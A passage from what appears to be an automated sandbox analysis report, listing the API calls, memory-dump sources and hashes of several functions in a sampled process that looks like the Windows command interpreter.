                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D57
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D61
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700183738.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.0000000000042000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$FullNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 268959451-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5b43d7b4217938bc2310c7abac87f67154184b361b7335ea62cb7c1d67331bc5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4126779c388bac4f910a38f611600d3a2847ca241b1ae1af0eb919eaa03fede0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b43d7b4217938bc2310c7abac87f67154184b361b7335ea62cb7c1d67331bc5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25315B39200212EBCB38DF68D8959BFB3F5EF84304724862DEA06C7291E7B5AE41C750
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0002742D Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _callnewh.MSVCRT ref: 00027437
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000274D1: ??0exception@@QAE@ABQBDH@Z.MSVCRT(000277EC,00000001), ref: 000274E7
                                                                                                                                                                                                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00027444
                                                                                                                                                                                                                                                                                                                                                                                                                          • _CxxThrowException.MSVCRT(?,0003CBF8), ref: 000277F5
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700183738.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.0000000000042000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ??0exception@@ExceptionThrow_callnewhmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 813871643-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 413eeb441fd5fd630803437d687e15b94a46d28824b769afa31e348565704b75
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd8edcd6c34883ecc864d7afcd3ab00a47512baa87f9e45b21eaaf572a362f0e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 413eeb441fd5fd630803437d687e15b94a46d28824b769afa31e348565704b75
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1E0DF3540C22DB7CF2076A5FC0ADEE3F6C8B80320B6480A4B91DA6492EF30DA12C6D1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001E470 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700183738.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.0000000000042000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: COMSPEC
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-1631433037
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c57aaaea36fbfc98fea6e85e5c070deed7154f244beca6ff733915f63a39c9ed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5589122b118740a34c86663ff68c134056d40f01ac9fb94966e587fee62d05fc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c57aaaea36fbfc98fea6e85e5c070deed7154f244beca6ff733915f63a39c9ed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97411470B04BD14BDBB4AB28E9557EE72D7AB90758F14042AFD0683292FA74DCC08693
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00022081 Relevance: 3.1, APIs: 2, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001F410: _wcsnicmp.MSVCRT ref: 0001F483
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001F410: memset.MSVCRT ref: 0001F4BA
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE(?,00000104,00007FE7), ref: 000220E5
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019458: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,0003C9D0,00000108,00022107,?,00000000,00000000,00000000), ref: 000194AA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019458: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 000194D9
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019458: memset.MSVCRT ref: 000194F1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019458: memset.MSVCRT ref: 0001954A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019458: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 0001955D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019458: lstrcmpW.KERNELBASE(00000000,\XCOPY.EXE), ref: 000195B8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,00007FE7), ref: 00022140
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700183738.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700421517.0000000000042000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000011.00000002.1700670459.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitle$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 388403260-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 22b987888c15ee837271f39e9606a5efbdd0e2b6e69688577bda10693a8622fb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: eee7c399dd0127f01775d6f22dcdc6bb6e0506234936d639c5c0f25b64aca03f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22b987888c15ee837271f39e9606a5efbdd0e2b6e69688577bda10693a8622fb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D731D671B01735A7DB24BBA4AC96FFD72A5AB55310F10016AF30A972C1DF784E81C751